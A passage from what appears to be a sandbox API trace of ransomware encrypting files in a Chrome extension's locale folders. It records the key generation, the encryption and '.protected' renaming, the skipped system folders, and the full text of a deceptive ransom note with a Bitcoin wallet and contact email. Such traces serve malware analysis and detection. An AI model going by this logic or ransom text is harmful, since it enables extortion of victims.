Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\RESTORE_FILES.txt") returned 159 [0081.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.436] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.436] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.437] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.437] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.437] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.437] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.437] CloseHandle (hObject=0x164) returned 1 [0081.437] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0081.438] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0081.438] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu") returned 141 [0081.438] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0081.438] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0081.438] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*") returned 143 [0081.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.438] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.438] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.438] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.438] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.438] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.438] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\.") returned 143 [0081.438] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.438] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.438] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.438] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.438] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.438] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.438] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.438] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\..") returned 144 [0081.438] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.438] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.438] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.438] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.439] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.439] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.439] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.439] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.439] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.439] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json") returned 155 [0081.439] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.439] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0081.440] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.441] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe2, lpOverlapped=0x0) returned 1 [0081.441] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.441] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.441] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.441] CloseHandle (hObject=0x168) returned 1 [0081.441] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.protected") returned 165 [0081.441] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\messages.json.protected")) returned 1 [0081.442] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.442] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.442] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0081.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.442] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.442] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.443] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.443] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.443] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.443] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.443] CloseHandle (hObject=0x164) returned 1 [0081.444] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.444] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0081.444] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0081.444] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0081.444] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0081.444] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0081.444] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id") returned 141 [0081.444] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0081.444] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0081.444] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*") returned 143 [0081.444] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.444] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.444] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.444] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.444] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.444] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.444] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\.") returned 143 [0081.444] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.444] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.444] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.444] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.444] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.444] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.444] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.444] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\..") returned 144 [0081.444] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.445] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.445] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.445] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.445] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.445] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.445] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.445] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.445] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json") returned 155 [0081.445] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.445] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0081.446] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.446] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xf2, lpOverlapped=0x0) returned 1 [0081.446] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.447] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.447] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.447] CloseHandle (hObject=0x168) returned 1 [0081.447] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.protected") returned 165 [0081.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\messages.json.protected")) returned 1 [0081.448] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.448] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.448] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\RESTORE_FILES.txt") returned 159 [0081.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 